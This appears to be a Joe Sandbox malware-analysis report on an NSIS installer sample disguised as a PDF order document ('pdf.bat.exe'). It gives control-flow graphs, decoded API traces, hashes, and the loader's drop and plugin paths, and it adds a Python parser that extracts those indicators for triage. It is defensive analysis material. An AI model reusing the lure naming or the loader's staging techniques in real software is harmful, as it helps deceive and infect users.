                                                                  • String ID: "C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$6B
                                                                  • API String ID: 1975747703-3339788236
                                                                  • Opcode ID: c728dd09fb0e724f558f784f5036d96df1f6ce9e2e9f1b64a51f93e144120454
                                                                  • Instruction ID: ac693f2390e271b0591ead3bca04d252cd9040af8bb9d400f005d771bc7483c2
                                                                  • Opcode Fuzzy Hash: c728dd09fb0e724f558f784f5036d96df1f6ce9e2e9f1b64a51f93e144120454
                                                                  • Instruction Fuzzy Hash: 0D61B770244600BFE630AF269D46F273A6CEB44B45F40057EF985B62E2DB7D5911CA2D

                                                                  Control-flow Graph

                                                                  control_flow_graph 369 402edd-402f2b GetTickCount GetModuleFileNameW call 405d7a 372 402f37-402f65 call 406284 call 405ba5 call 406284 GetFileSize 369->372 373 402f2d-402f32 369->373 381 403052-403060 call 402e79 372->381 382 402f6b 372->382 375 40310f-403113 373->375 388 403062-403065 381->388 389 4030b5-4030ba 381->389 384 402f70-402f87 382->384 386 402f89 384->386 387 402f8b-402f94 call 4032fb 384->387 386->387 395 402f9a-402fa1 387->395 396 4030bc-4030c4 call 402e79 387->396 391 403067-40307f call 403311 call 4032fb 388->391 392 403089-4030b3 GlobalAlloc call 403311 call 403116 388->392 389->375 391->389 418 403081-403087 391->418 392->389 416 4030c6-4030d7 392->416 400 402fa3-402fb7 call 405d35 395->400 401 40301d-403021 395->401 396->389 407 40302b-403031 400->407 415 402fb9-402fc0 400->415 406 403023-40302a call 402e79 401->406 401->407 406->407 412 403040-40304a 407->412 413 403033-40303d call 406751 407->413 412->384 417 403050 412->417 413->412 415->407 422 402fc2-402fc9 415->422 423 4030d9 416->423 424 4030df-4030e4 416->424 417->381 418->389 418->392 422->407 425 402fcb-402fd2 422->425 423->424 426 4030e5-4030eb 424->426 425->407 427 402fd4-402fdb 425->427 426->426 428 4030ed-403108 SetFilePointer call 405d35 426->428 427->407 429 402fdd-402ffd 427->429 432 40310d 428->432 429->389 431 403003-403007 429->431 433 403009-40300d 431->433 434 40300f-403017 431->434 432->375 433->417 433->434 434->407 435 403019-40301b 434->435 435->407
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 00402EEE
                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe,00000400,?,00000006,00000008,0000000A), ref: 00402F0A
                                                                    • Part of subcall function 00405D7A: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                                                    • Part of subcall function 00405D7A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                                                  • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe,C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                  • String ID: "C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author $Null$soft
                                                                  • API String ID: 4283519449-4217358736
                                                                  • Opcode ID: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
                                                                  • Instruction ID: 8370a5f95b7ae461dcbe38738d17cc5e552d4c17a0c1bed0763bf9a4eadef116
                                                                  • Opcode Fuzzy Hash: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
                                                                  • Instruction Fuzzy Hash: FF51D171901204AFDB20AF65DD85B9E7FA8EB04319F14417BF904B72D5C7788E818BAD

                                                                  Control-flow Graph

                                                                  control_flow_graph 436 4062a6-4062b1 437 4062b3-4062c2 436->437 438 4062c4-4062da 436->438 437->438 439 4062e0-4062ed 438->439 440 4064f2-4064f8 438->440 439->440 441 4062f3-4062fa 439->441 442 4064fe-406509 440->442 443 4062ff-40630c 440->443 441->440 445 406514-406515 442->445 446 40650b-40650f call 406284 442->446 443->442 444 406312-40631e 443->444 447 406324-406362 444->447 448 4064df 444->448 446->445 450 406482-406486 447->450 451 406368-406373 447->451 452 4064e1-4064eb 448->452 453 4064ed-4064f0 448->453 456 406488-40648e 450->456 457 4064b9-4064bd 450->457 454 406375-40637a 451->454 455 40638c 451->455 452->440 453->440 454->455 460 40637c-40637f 454->460 463 406393-40639a 455->463 461 406490-40649c call 4061cb 456->461 462 40649e-4064aa call 406284 456->462 458 4064cc-4064dd lstrlenW 457->458 459 4064bf-4064c7 call 4062a6 457->459 458->440 459->458 460->455 466 406381-406384 460->466 472 4064af-4064b5 461->472 462->472 468 40639c-40639e 463->468 469 40639f-4063a1 463->469 466->455 473 406386-40638a 466->473 468->469 470 4063a3-4063ca call 406152 469->470 471 4063dc-4063df 469->471 484 4063d0-4063d7 call 4062a6 470->484 485 40646a-40646d 470->485 477 4063e1-4063ed GetSystemDirectoryW 471->477 478 4063ef-4063f2 471->478 472->458 476 4064b7 472->476 473->463 480 40647a-406480 call 406518 476->480 481 406461-406465 477->481 482 4063f4-406402 GetWindowsDirectoryW 478->482 483 40645d-40645f 478->483 480->458 481->480 487 406467 481->487 482->483 483->481 486 406404-40640e 483->486 484->481 485->480 490 40646f-406475 lstrcatW 485->490 492 406410-406413 486->492 493 406428-40643e SHGetSpecialFolderLocation 486->493 487->485 490->480 492->493 497 406415-40641c 492->497 494 406440-406457 SHGetPathFromIDListW CoTaskMemFree 493->494 495 406459 493->495 494->481 494->495 495->483 498 406424-406426 497->498 498->481 498->493
                                                                  APIs
                                                                  • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063E7
                                                                  • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,?,00405323,Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,00000000), ref: 004063FA
                                                                  • SHGetSpecialFolderLocation.SHELL32(00405323,00410EA0,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,?,00405323,Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,00000000), ref: 00406436
                                                                  • SHGetPathFromIDListW.SHELL32(00410EA0,Call), ref: 00406444
                                                                  • CoTaskMemFree.OLE32(00410EA0), ref: 0040644F
                                                                  • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406475
                                                                  • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,?,00405323,Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,00000000), ref: 004064CD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                  • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                  • API String ID: 717251189-1599669604
                                                                  • Opcode ID: dd46a77467dc7c45da866f78f431b637c84e84ab5556cb2168e2007360d71072
                                                                  • Instruction ID: 605843c2509a57f6f3c23207e2b9262681d5cb504286618bc70e882f3b2b38d7
                                                                  • Opcode Fuzzy Hash: dd46a77467dc7c45da866f78f431b637c84e84ab5556cb2168e2007360d71072
                                                                  • Instruction Fuzzy Hash: 2C611171A00215ABDF209F64CC40AAE37A5AF54314F22813FE947BB2D0D77D5AA2CB5D
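                                                                  The API listings in this report all use one fixed line shape (bullet, function, module, decoded arguments, "ref:" address, with an optional "Part of subcall function" prefix), and the arguments are where the useful indicators sit: the sample's own path on the Desktop, the NSIS plugin staging directory under %TEMP% (nsu92B7.tmp\System.dll), the registry key Control Panel\Desktop\ResourceLocale, and the unusual drop directory under AppData\Roaming\Microsoft\Windows\Templates. The following parser is an added example for this report, not Joe Sandbox's code and not code from the sample; the sample lines inside it are copied from the listings above, and the triage rules in classify_path() (which directories an installer is expected to touch, and the ns?XXXX.tmp naming of NSIS plugin directories) are this example's own assumptions.

```python
"""Parse Joe Sandbox 'APIs' trace lines into structured records and pull out
the file-system and registry indicators they carry.

Added example for this report, not Joe Sandbox's or the sample's own code.
SAMPLE_LINES are copied from the API listings in this report; the triage
rules in classify_path() are this example's own assumption."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# One API line: "• Func.MODULE(arg,arg,...), ref: 0040XXXX".  Lines belonging
# to a callee carry the prefix "Part of subcall function 0040XXXX:"; a call
# with no decoded arguments has no parentheses ("DestroyWindow.USER32 ref: ...").
API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<func>\w+)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$")
WIN_PATH = re.compile(r'[A-Za-z]:\\[^,"]+')
REG_KEY = re.compile(r"(?:HKLM|HKCU|HKEY_[A-Z_]+|Software|Control Panel)\\[^,]+")
# Assumption: NSIS stages its plugins in %TEMP%\ns?XXXX.tmp (here nsu92B7.tmp).
NSIS_PLUGIN_DIR = re.compile(r"\\ns[a-z][0-9A-Fa-f]{4}\.tmp\\", re.IGNORECASE)

SAMPLE_LINES = [  # copied from the API listings in this report
    r"• GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,?,00405323,Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,00000000), ref: 004063FA",
    r"• lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406475",
    r"• lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Bubblebow,?,?,00000031), ref: 004017B0",
    r"• GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe,00000400,?,00000006,00000008,0000000A), ref: 00402F0A",
    r"  • Part of subcall function 00405D7A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0",
    r'• lstrcatW.KERNEL32(1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe",00000000), ref: 004039F5',
    r"• DestroyWindow.USER32 ref: 00403D8F",
]


@dataclass
class ApiCall:
    func: str
    module: str
    args: List[str]
    ref: int                      # address of the call site
    parent: Optional[int] = None  # function this call was reported under, if a subcall
    paths: List[str] = field(default_factory=list)
    reg_keys: List[str] = field(default_factory=list)


def classify_path(path: str) -> str:
    """Triage rule (assumption): where an installer is expected to write."""
    low = path.lower()
    if NSIS_PLUGIN_DIR.search(path):
        return "nsis_plugin_staging"
    if "\\appdata\\local\\temp\\" in low:
        return "temp"
    if "\\desktop\\" in low:
        return "sample_location"
    if "\\appdata\\roaming\\" in low:
        return "drop_candidate"   # deep, non-standard Roaming subtree: worth a look
    return "other"


def parse_api_line(line: str) -> Optional[ApiCall]:
    m = API_LINE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [a.strip() for a in raw.split(",")] if raw else []
    call = ApiCall(func=m.group("func"), module=m.group("module"), args=args,
                   ref=int(m.group("ref"), 16),
                   parent=int(m.group("parent"), 16) if m.group("parent") else None)
    for a in args:                      # pull paths and registry keys out of the decoded args
        p = WIN_PATH.search(a)
        if p:
            call.paths.append(p.group(0))
            continue
        r = REG_KEY.search(a)
        if r:
            call.reg_keys.append(r.group(0))
    return call


def triage(lines):
    """Return parsed calls, paths grouped by classification, and registry keys."""
    calls = [c for c in map(parse_api_line, lines) if c is not None]
    paths = {}
    for c in calls:
        for p in c.paths:
            paths.setdefault(classify_path(p), set()).add(p)
    reg_keys = sorted({k for c in calls for k in c.reg_keys})
    return {"calls": calls, "paths": paths, "reg_keys": reg_keys}


if __name__ == "__main__":
    result = triage(SAMPLE_LINES)
    for c in result["calls"]:
        print(f"{c.ref:08X} {c.module}!{c.func} args={len(c.args)}")
    for kind, found in sorted(result["paths"].items()):
        print(kind, sorted(found))
    print("registry:", result["reg_keys"])
```

Run on the seven lines above, the parser yields seven calls, puts the Templates\vaporarium\... path in drop_candidate, the nsu92B7.tmp\System.dll path in nsis_plugin_staging, and records Control Panel\Desktop\ResourceLocale as the only registry key. Point it at the whole APIs section of a report and the drop_candidate bucket is a quick way to recover the loader's staging directory without reading every function block.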

                                                                  Control-flow Graph

                                                                  control_flow_graph 563 40176f-401794 call 402c41 call 405bd0 568 401796-40179c call 406284 563->568 569 40179e-4017b0 call 406284 call 405b59 lstrcatW 563->569 574 4017b5-4017b6 call 406518 568->574 569->574 578 4017bb-4017bf 574->578 579 4017c1-4017cb call 4065c7 578->579 580 4017f2-4017f5 578->580 587 4017dd-4017ef 579->587 588 4017cd-4017db CompareFileTime 579->588 581 4017f7-4017f8 call 405d55 580->581 582 4017fd-401819 call 405d7a 580->582 581->582 590 40181b-40181e 582->590 591 40188d-4018b6 call 4052ec call 403116 582->591 587->580 588->587 592 401820-40185e call 406284 * 2 call 4062a6 call 406284 call 4058ea 590->592 593 40186f-401879 call 4052ec 590->593 603 4018b8-4018bc 591->603 604 4018be-4018ca SetFileTime 591->604 592->578 626 401864-401865 592->626 605 401882-401888 593->605 603->604 607 4018d0-4018db CloseHandle 603->607 604->607 608 402ace 605->608 610 4018e1-4018e4 607->610 611 402ac5-402ac8 607->611 612 402ad0-402ad4 608->612 615 4018e6-4018f7 call 4062a6 lstrcatW 610->615 616 4018f9-4018fc call 4062a6 610->616 611->608 622 401901-4022fc call 4058ea 615->622 616->622 622->612 626->605 628 401867-401868 626->628 628->593
                                                                  APIs
                                                                  • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Bubblebow,?,?,00000031), ref: 004017B0
                                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Bubblebow,?,?,00000031), ref: 004017D5
                                                                    • Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291
                                                                    • Part of subcall function 004052EC: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                                                    • Part of subcall function 004052EC: lstrlenW.KERNEL32(0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                                    • Part of subcall function 004052EC: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,0040324F,0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,00000000,00410EA0,004030B0), ref: 00405347
                                                                    • Part of subcall function 004052EC: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll), ref: 00405359
                                                                    • Part of subcall function 004052EC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                                    • Part of subcall function 004052EC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                                    • Part of subcall function 004052EC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp$C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Bubblebow$Call
                                                                  • API String ID: 1941528284-4171931090
                                                                  • Opcode ID: b281b56859217cd12faca26e4537830f2bf9983139c1f988b18464fa74c6c1d9
                                                                  • Instruction ID: 128eea75dfaaf3eda36781b62dd3037428c7b97943fe82b2985fb16c69cf4114
                                                                  • Opcode Fuzzy Hash: b281b56859217cd12faca26e4537830f2bf9983139c1f988b18464fa74c6c1d9
                                                                  • Instruction Fuzzy Hash: C541A031900519BFCF10BBA5CD46EAE3679EF45328B20427FF412B10E1CA3C8A519A6E

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 629 4052ec-405301 630 405307-405318 629->630 631 4053b8-4053bc 629->631 632 405323-40532f lstrlenW 630->632 633 40531a-40531e call 4062a6 630->633 635 405331-405341 lstrlenW 632->635 636 40534c-405350 632->636 633->632 635->631 637 405343-405347 lstrcatW 635->637 638 405352-405359 SetWindowTextW 636->638 639 40535f-405363 636->639 637->636 638->639 640 405365-4053a7 SendMessageW * 3 639->640 641 4053a9-4053ab 639->641 640->641 641->631 642 4053ad-4053b0 641->642 642->631
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                                                  • lstrlenW.KERNEL32(0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                                  • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,0040324F,0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,00000000,00410EA0,004030B0), ref: 00405347
                                                                  • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll), ref: 00405359
                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                  • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll
                                                                  • API String ID: 2531174081-2055974490
                                                                  • Opcode ID: f62b684c0e6f289dd6bb465d0f12a75b041ce70bd46b314235ddfc122f96f8a0
                                                                  • Instruction ID: 5cbdc996bc9841dedcc8c590482a37e7ed43af3164ff52369f5afd8429117419
                                                                  • Opcode Fuzzy Hash: f62b684c0e6f289dd6bb465d0f12a75b041ce70bd46b314235ddfc122f96f8a0
                                                                  • Instruction Fuzzy Hash: FA219D71900618BBDB11AF96DD849CFBF78EF45354F50807AF904B62A0C3B94A50CFA8

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 643 40264a-402663 call 402c1f 646 402ac5-402ac8 643->646 647 402669-402670 643->647 648 402ace-402ad4 646->648 649 402672 647->649 650 402675-402678 647->650 649->650 652 4027dc-4027e4 650->652 653 40267e-40268d call 4061e4 650->653 652->646 653->652 656 402693 653->656 657 402699-40269d 656->657 658 402732-402735 657->658 659 4026a3-4026be ReadFile 657->659 661 402737-40273a 658->661 662 40274d-40275d call 405dfd 658->662 659->652 660 4026c4-4026c9 659->660 660->652 664 4026cf-4026dd 660->664 661->662 665 40273c-402747 call 405e5b 661->665 662->652 671 40275f 662->671 667 4026e3-4026f5 MultiByteToWideChar 664->667 668 402798-4027a4 call 4061cb 664->668 665->652 665->662 667->671 672 4026f7-4026fa 667->672 668->648 674 402762-402765 671->674 675 4026fc-402707 672->675 674->668 677 402767-40276c 674->677 675->674 678 402709-40272e SetFilePointer MultiByteToWideChar 675->678 679 4027a9-4027ad 677->679 680 40276e-402773 677->680 678->675 681 402730 678->681 683 4027ca-4027d6 SetFilePointer 679->683 684 4027af-4027b3 679->684 680->679 682 402775-402788 680->682 681->671 682->652 687 40278a-402790 682->687 683->652 685 4027b5-4027b9 684->685 686 4027bb-4027c8 684->686 685->683 685->686 686->652 687->657 688 402796 687->688 688->652
                                                                  APIs
                                                                  • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                  • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                    • Part of subcall function 00405E5B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E71
                                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                  • String ID: 9
                                                                  • API String ID: 163830602-2366072709
                                                                  • Opcode ID: c1a2398a3cf68ffccba9bba39206efc2048042628f08e4a72376123c44d13fd0
                                                                  • Instruction ID: 3d8386ac743f87b5a59d0c6af2c48158715b6bf8f4fdb2ba716f86882e7a1e00
                                                                  • Opcode Fuzzy Hash: c1a2398a3cf68ffccba9bba39206efc2048042628f08e4a72376123c44d13fd0
                                                                  • Instruction Fuzzy Hash: 46510A74D10219AEDF219F95DA88AAEB779FF04304F50443BE901F72D1D7B49982CB58

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 689 4065ee-40660e GetSystemDirectoryW 690 406610 689->690 691 406612-406614 689->691 690->691 692 406625-406627 691->692 693 406616-40661f 691->693 695 406628-40665b wsprintfW LoadLibraryExW 692->695 693->692 694 406621-406623 693->694 694->695
                                                                  APIs
                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406605
                                                                  • wsprintfW.USER32 ref: 00406640
                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406654
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
